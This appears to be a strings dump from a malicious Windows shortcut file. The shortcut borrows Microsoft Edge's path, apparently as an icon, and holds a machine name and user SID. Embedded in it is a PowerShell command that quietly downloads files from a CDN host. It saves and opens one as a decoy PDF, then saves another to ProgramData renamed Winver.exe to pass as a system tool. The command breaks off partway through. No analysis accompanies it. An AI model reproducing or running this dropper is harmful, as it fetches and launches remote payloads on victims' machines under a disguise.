Windows
System32
WindowsPowerShell
powershell.exe
T%IAV1(.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
desktop-4f6tsvl
%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
powershell.exe
B..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
$ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/r" -OutFile "C:\ProgramData\p";move "C:\ProgramData\p" "C:\ProgramData\Winver.exe";wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem
%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
v1.0 (C:\Windows\System32\WindowsPowerShell)
S-1-5-21-1453295128-2262805681-55198072-1000
powershell.exe
Application
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe